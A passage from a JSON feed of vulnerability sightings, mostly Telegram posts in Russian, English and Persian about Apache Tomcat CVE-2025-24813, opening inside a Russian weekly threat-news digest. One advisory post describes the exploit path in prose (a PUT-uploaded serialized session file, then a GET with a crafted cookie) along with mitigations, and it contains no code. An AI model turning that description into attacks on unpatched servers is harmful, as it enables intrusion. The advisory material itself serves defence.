\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0438 \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0418\u0411 \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\u25b6\ufe0f\u041d\u043e\u0432\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435\u043c \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 TookPS. \u0420\u0430\u043d\u0435\u0435 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b DeepSeek, \u043d\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u0435\u043b\u0438 \u0442\u0430\u043a\u0436\u0435 \u043c\u0438\u043c\u0438\u043a\u0440\u0438\u0440\u0443\u044e\u0442 \u043f\u043e\u0434 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0430\u0439\u0442\u044b \u041f\u041e \u0434\u043b\u044f 3D-\u043c\u043e\u0434\u0435\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f, \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430, \u0438 \u0434\u0440.\n \n\u25b6\ufe0f\u0412\u043e\u043e\u0431\u0449\u0435 \u043d\u043e\u0432\u044b\u0445 \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0451\u043d\u043d\u044b\u0445 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u043e\u0432 \u043f\u043e\u0434\u0432\u0435\u0437\u043b\u0438 \u043c\u043d\u043e\u0433\u043e: IDATloader/HijackLoader, Emmenthal/Smokeloader, Gootloader.\n\n\u25b6\ufe0fOperation HoloQuill \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0435 \u0438 \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0430\u0440\u0445\u0438\u0432\u043e\u0432 \u0441 \u043c\u043d\u043e\u0433\u043e\u0441\u0442\u0443\u043f\u0435\u043d\u0447\u0430\u0442\u044b\u043c \u0412\u041f\u041e, \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0441\u0447\u0435\u0442\u0435 \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u044e\u0449\u0438\u043c \u0438\u043c\u043f\u043b\u0430\u043d\u0442 Cobalt Strike.\n\n\u25b6\ufe0f\u0414\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432 \u0437\u0430\u0449\u0438\u0442\u044b MS-NRPC \u0438 \u0438\u0445 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u043c\u043d\u043e\u0433\u0438\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0430 RPC \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0442\u0440\u0435\u0431\u0443\u0435\u0442.\n\n\u25b6\ufe0f\u041e\u0431\u0437\u043e\u0440 APT Earth Alux \u0438 \u0435\u0451 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0433\u043e \u0412\u041f\u041e, \u0431\u044d\u043a\u0434\u043e\u0440\u0430 Vargeit. \u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435, \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437 \u0410\u0437\u0438\u0438, \u043e\u0442\u0434\u0430\u044e\u0442 \u043f\u0440\u0438\u043e\u0440\u0438\u0442\u0435\u0442 \u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0438 \u0441\u043a\u0440\u044b\u0442\u043d\u044b\u043c \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f\u043c, \u043c\u0438\u0448\u0435\u043d\u0438 \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u044b \u0432 \u0410\u0437\u0438\u0438 \u0438 \u041b\u0430\u0442\u0438\u043d\u0441\u043a\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435.\n \n\u25b6\ufe0f\u0422\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u044f \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u04212 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Fast flux \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e \u0443\u0434\u043e\u0441\u0442\u043e\u0438\u043b\u0430\u0441\u044c \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043e\u0442 CISA, \u0410\u041d\u0411, \u0424\u0411\u0420 \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0430\u043d\u0433\u043b\u043e\u044f\u0437\u044b\u0447\u043d\u044b\u0445 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432.  \n\n\u25b6\ufe0f\u041d\u0435\u0431\u0435\u0437\u044b\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f Hunters International \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u043e \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0438 \u0432 World Leaks \u2014 \u043f\u043b\u0430\u043d\u0438\u0440\u0443\u044e\u0442 \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043e\u0442 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043a \u0447\u0438\u0441\u0442\u043e\u0439 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438 \u0445\u0432\u0430\u043b\u044f\u0442\u0441\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u041f\u041e \u0434\u043b\u044f \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u25b6\ufe0f\u0412 \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0444\u0438\u0448\u0435\u0440\u043e\u0432 \u043f\u0440\u043e\u0447\u043d\u043e \u0432\u043e\u0448\u0451\u043b \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u2014 \u0440\u0435\u0434\u0438\u0440\u0435\u043a\u0442\u044b \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 SVG-\u0444\u0430\u0439\u043b\u043e\u0432.\n\n\u25b6\ufe0f\u0421\u0432\u0435\u0436\u0443\u044e CVE-2025-24813 \u0432 Apache Tomcat \u0443\u0436\u0435 \u0432\u0437\u044f\u043b\u0438 \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u044b. \n\n\u25b6\ufe0f\u0410 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Jinx-0126 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043d\u043e\u0432\u043e\u0435 \u0412\u041f\u041e CPU_HU \u0434\u043b\u044f \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0411\u0414 PostgresSQL.\n\n\u25b6\ufe0f\u0412\u044b \u043d\u0435 \u043f\u043e\u0432\u0435\u0440\u0438\u0442\u0435, \u043d\u043e Ivanti \u0441\u043d\u043e\u0432\u0430 \u0437\u0430\u043a\u0440\u044b\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0438\u0437\u0434\u0435\u043b\u0438\u044f\u0445, \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0441\u043d\u043e\u0432\u0430 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0438\u0437 UNC5521.\n\n\u25b6\ufe0f\u0415\u0449\u0451 \u043e\u0434\u0438\u043d \u043e\u0431\u0437\u043e\u0440 \u0442\u0440\u0435\u043d\u0434\u043e\u0432 \u00ab\u043a\u0432\u0438\u0448\u0438\u043d\u0433\u0430\u00bb, \u0442\u043e \u0435\u0441\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u0441 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435\u043c QR-\u043a\u043e\u0434\u043e\u0432. \u041c\u043d\u043e\u0433\u0438\u0435 \u0418\u0411-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u0440\u0435\u0437\u043a\u0438\u0439 \u0440\u043e\u0441\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u0442\u0430\u043a\u0442\u0438\u043a\u0438.\n\n\u25b6\ufe0f\u0420\u0430\u0437\u0431\u043e\u0440 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u043e\u0432\u043e\u0433\u043e \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u0434\u043b\u044f Linux, Autocolor.\n\n\u25b6\ufe0f\u041d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u043c \u0440\u044b\u043d\u043a\u0435 \u0443\u0447\u0430\u0441\u0442\u0438\u043b\u0438\u0441\u044c \u0441\u043b\u0443\u0447\u0430\u0438 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u043c\u0430\u0440\u0442\u0444\u043e\u043d\u043e\u0432, \u0443\u0436\u0435 \u0441 \u0437\u0430\u0432\u043e\u0434\u0430 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 Android-\u0442\u0440\u043e\u044f\u043d\u0446\u0435\u043c Triada. \u0417\u043b\u043e\u0432\u0440\u0435\u0434 \u043a\u0440\u0430\u0434\u0451\u0442 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u0443, \u0443\u0447\u0451\u0442\u043a\u0438 \u0432 \u043c\u0435\u0441\u0441\u0435\u043d\u0434\u0436\u0435\u0440\u0430\u0445, \u0438 \u043c\u043d\u043e\u0433\u043e\u0435 \u0434\u0440\u0443\u0433\u043e\u0435.\n\n#APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 #\u043d\u043e\u0432\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2025-04-07T09:30:27.000000Z"}, {"uuid": "9d134317-2ed6-48e0-8c27-57eb249b6f03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/CyberBulletin/2582", "content": "\u26a1CVE-2025-24813 in Apache Tomcat drops\u2014potential RCE, data leaks, or corruption via partial PUTs! Attackers could OWN your servers.\n\n#CyberBulletin", "creation_timestamp": "2025-03-11T14:18:32.000000Z"}, {"uuid": "7764dcd6-d4f7-42a6-83d7-7c6e039caa3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/CyberBulletin/2684", "content": "\u26a1CVE-2025-24813 Potential RCE and/or information disclosure.\n\nVersions Affected:\nApache Tomcat 11.0.0-M1 to 11.0.2\nApache Tomcat 10.1.0-M1 to 10.1.34\nApache Tomcat 9.0.0.M1 to 9.0.98\n\n#CyberBulletin", "creation_timestamp": "2025-03-19T09:59:59.000000Z"}, {"uuid": "65cd6763-b46b-4180-8eb5-1004e1a6fcd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/CyberBulletin/2679", "content": "\u26a1A critical remote code execution (RCE) vulnerability in Apache Tomcat tracked as CVE-2025-24813 is actively exploited in the wild, enabling attackers to take over servers with a simple PUT request. \n\n#CyberBulletin", "creation_timestamp": "2025-03-18T05:44:12.000000Z"}, {"uuid": "88bbe0c7-bf00-4588-a3dc-0a4d7a8dcd8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/CyberBulletin/2576", "content": "\u26a1CVE-2025-24813 Flaw in Apache Tomcat Exposes Servers to RCE, Data Leaks: Update Immediately.\n\n#CyberBulletin", "creation_timestamp": "2025-03-11T14:11:52.000000Z"}, {"uuid": "e4183546-7c2b-4786-b3cd-dbacea02a9d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/kasperskyb2b/1662", "content": "\ud83d\udc31 \u041e\u043f\u0430\u0441\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache Tomcat \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u0436\u0438\u0432\u0443\u044e.\n\n\u041e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u0430\u044f \u043d\u0435\u0434\u0435\u043b\u044e \u043d\u0430\u0437\u0430\u0434 CVE-2025-24813 \u0432 Apache Tomcat \u0432\u0435\u0440\u0441\u0438\u0439 9, 10 \u0438 11 \u043e\u0431\u0437\u0430\u0432\u0435\u043b\u0430\u0441\u044c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u043c PoC. \u0410\u0442\u0430\u043a\u0430 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u043c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0435 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0441\u0435\u0441\u0441\u0438\u0439 \u0432 Tomcat \u0438 \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0438\u0437 \u0434\u0432\u0443\u0445 \u0447\u0430\u0441\u0442\u0435\u0439: \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043c\u0435\u0442\u043e\u0434\u043e\u043c PUT \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0441\u0435\u0441\u0441\u0438\u043e\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Java, \u0430 \u0437\u0430\u0442\u0435\u043c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e GET, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044f \u0432 \u043a\u0443\u043a\u0438 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u0441\u0435\u0441\u0441\u0438\u0438. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0435\u0437 \u0432\u0441\u044f\u043a\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0434\u043e\u0441\u0442\u0438\u0436\u0438\u043c\u0430 RCE \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0432\u044b\u0442\u0435\u043a\u0430\u044e\u0449\u0438\u043c\u0438 \u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c\u0438. \u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 \u2014 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u0434\u043e\u043b\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043e \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0441\u0435\u0441\u0441\u0438\u0439 \u0432 \u0444\u0430\u0439\u043b\u0430\u0445, \u043d\u043e \u044d\u0442\u043e \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u0430\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0435\u0438\u0437\u0431\u0435\u0436\u043d\u044b.  \u0411\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043d\u044b \u0437\u0434\u0435\u0441\u044c.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432\u0441\u0435\u0433\u043e \u0447\u0435\u0440\u0435\u0437 30 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438 \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044f Apache, \u0430 \u0441 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e PoC \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 Tomcat \u0441\u0442\u0430\u043b\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u044c\u044e. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u043c\u0438\u0442\u0438\u0433\u0430\u0446\u0438\u0438 \u043c\u043e\u0436\u043d\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043d\u0430 \u0437\u0430\u043f\u0438\u0441\u044c \u0434\u043b\u044f \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0441\u0435\u0440\u0432\u043b\u0435\u0442\u043e\u0432 (\u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 readonly \u0432 conf/web.xml) \u0438\u043b\u0438 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c  \u0447\u0430\u0441\u0442\u0438\u0447\u043d\u044b\u0439 PUT  (allowPartialPut=false).\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 @\u041f2\u0422", "creation_timestamp": "2025-03-18T13:37:26.000000Z"}, {"uuid": "636bb27b-9603-445b-9b9b-6c4dc7b0c631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/MalaysiaHacktivistz/10097", "content": "Hackers Actively Exploit Apache Tomcat Servers via CVE-2025-24813 \u2013 Patch Now \u2013 gbhackers.com\n\nFri, 21 Mar 2025 19:11:23", "creation_timestamp": "2025-03-21T13:04:33.000000Z"}, {"uuid": "bb696e8f-3d8a-4ae9-ab3a-bc7b9f2f4e1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/cibsecurity/83770", "content": "\ud83e\udd85 CERT NZ Shares Critical Advisory for CVE-2025-24813 Vulnerability in Apache Tomcat \ud83e\udd85\n\nCyble Cyble CERT NZ Shares Critical Advisory for CVE202524813 Vulnerability in Apache Tomcat \" dataimagecaption\"Cyble Cyble CERT NZ Shares Critical Advisory for CVE202524813 Vulnerability in Apache Tomcat \" datamediumfile\"httpscyble.comwpcontentuploads202503CybleBlogsCVE2025248131300x150.png\" datalargefile\"httpscyble.comwpcontentuploads202503CybleBlogsCVE20252481311024x512.png\" title\"CERT NZ Shares Critical Advisory for CVE202524813 Vulnerability in Apache Tomcat 2\"  Overview     The New Zealand Computer Emergency Response Team CERT NZ recently issued an urgent security advisory regarding a critical vulnerability, CVE202524813, affecting Apache Tomcat across multiple versions. This Apache Tomcat vulnerability, identified in March 2025, poses severe risks, including remote code execution...\n\n\ud83d\udcd6 Read more.\n\n\ud83d\udd17 Via \"CYBLE\"\n\n----------\n\ud83d\udc41\ufe0f Seen on @cibsecurity", "creation_timestamp": "2025-03-19T15:02:47.000000Z"}, {"uuid": "77cce348-245f-4280-aaee-42de9c496469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/SYmGj_MDj-F682IcXl4wrcSlV57ttmjlosZ04VZo999eeGs", "content": "", "creation_timestamp": "2025-04-07T05:00:06.000000Z"}, {"uuid": "4868ccac-fbb2-46d2-bfd1-79db1d414dee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "https://t.me/MalaysiaHacktivistz/2720", "content": "Hackers Actively Exploit Apache Tomcat Servers via CVE-2025-24813 \u2013 Patch Now \u2013 gbhackers.com\n\nFri, 21 Mar 2025 19:11:23", "creation_timestamp": "2025-03-21T13:04:33.000000Z"}, {"uuid": "a4f7d93d-3b41-43ea-8fc5-ad541f28a7f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "exploited", "source": "Telegram/yhcYpvZu6Bxlq8Hsef2NCCJ6Tsk6IKBWDKd0PNM5ciaL3Q", "content": "", "creation_timestamp": "2025-03-17T20:41:23.000000Z"}, {"uuid": "cc986916-5253-414a-9412-63101678dfc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/AzPQc8BypPug0v3haYvH4n5j-0vLxsu-ng01TlwKe66ObjQ", "content": "", "creation_timestamp": "2025-03-28T22:00:05.000000Z"}, {"uuid": "7268e99e-2ecb-43e1-bd5c-22fda0631106", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/vUGMvstSYOoUDxx-O4QTLDAV49BnFrwaRby9_jbBdmSD8WM", "content": "", "creation_timestamp": "2025-03-22T22:00:06.000000Z"}, {"uuid": "45fd1199-937c-4617-a012-e6c977d80829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/MKbDAY2Rgx9FRJ10NVo62t2l6PAL1hhNybr5tRYKNVVonWg", "content": "", "creation_timestamp": "2025-04-13T05:00:06.000000Z"}, {"uuid": "e09cd90a-e962-4cf2-857b-02ed7aea308e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "Telegram/9k_C5JXeLGhpcgGl3TlsIBGRr_8CSnsQH8RurvDjcthq00c", "content": "", "creation_timestamp": "2025-04-11T17:00:09.000000Z"}, {"uuid": "39b4d45c-9a95-4d69-8baf-7d9d2eb093ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-24813", "type": "seen", "source": "https://t.me/ViralCyber/11540", "content": "\ud83d\udd34 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u062f\u0631 Apache Tomcat\n\n\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 \u06cc CVE-2025-24813 \u062f\u0631 Apache Tomcat \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 RCE\u060c \u0627\u0641\u0634\u0627\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u062d\u0633\u0627\u0633 \u0648 \u062f\u0633\u062a\u06a9\u0627\u0631\u06cc \u062f\u0627\u062f\u0647 \u0647\u0627 \u0631\u0648 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 